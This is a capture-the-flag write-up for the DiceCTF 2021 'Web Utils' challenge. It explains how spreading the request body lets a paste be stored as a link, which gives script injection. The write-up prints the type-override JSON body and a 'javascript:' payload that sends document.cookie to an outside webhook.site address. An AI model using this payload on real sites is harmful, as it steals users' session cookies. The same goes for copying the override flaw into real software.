Rating:

# Web Utils

- CTF: DiceCTF 2021
- Category: Web

## Instructions

My friend made [this dumb tool](https://web-utils.dicec.tf/); can you try and steal his cookies? If you send me a link, [I can pass it along](https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=web-utils).

Code in the [zip file](app.zip)

This app offers two features:
- Link shortener
- Pastebin

The relevant code is here:

```js
// Create a "paste"
fastify.post('createPaste', {
handler: (req, rep) => {
const uid = database.generateUid(8);
database.addData({ type: 'paste', ...req.body, uid });
rep
.code(200)
.header('Content-Type', 'application/json; charset=utf-8')
.send({
statusCode: 200,
data: uid
});
},
schema: {
body: {
type: 'object',
required: ['data'],
properties: {
data: { type: 'string' }
}
}
}
});
```

```html

<html>
<head>
<script async>
(async () => {
const id = window.location.pathname.split('/')[2];
if (! id) window.location = window.origin;
const res = await fetch(`${window.origin}/api/data/${id}`);
const { data, type } = await res.json();
if (! data || ! type ) window.location = window.origin;
if (type === 'link') return window.location = data;
if (document.readyState !== "complete")
await new Promise((r) => { window.addEventListener('load', r); });
document.title = 'Paste';
document.querySelector('div').textContent = data;
})()
</script>
</head>
<body>
<div style="font-family: monospace"></div>
</body>
</html>
```

## Analysis

The API endpoint allows you to override the type (paste or link) of what you are sending because the code explode the `req.body` after setting the type:

```js
database.addData({ type: 'paste', ...req.body, uid });
```

So we can create a `link` by sending a body as follow:

`{"data":"My paste data goes here","type":"link"}`

We now have the possibility to have text which is not a URL stored in the database as a link, which means the view page will run the following code:

```js
if (type === 'link') return window.location = data;
```

We can write the following allowing us to steal the admin cookie:

```js
javascript:document.location='https://webhook.site/768da366-9c5e-4d86-9140-8afb55ccbd1b?c='+document.cookie
```

We need to first store the above code as a link:

![Create the link via api](create-link.png)

Once this is created, we can submit the following URL to the admin:

https://web-utils.dicec.tf/view/vXK4PSDY

When the admin visits that link, they will be redirect to our endpoint with the cookie as a query param.

![Flag](flag.png)

Original writeup (https://github.com/0x00000dab/2021-DiceCTF/tree/master/web-web-utils).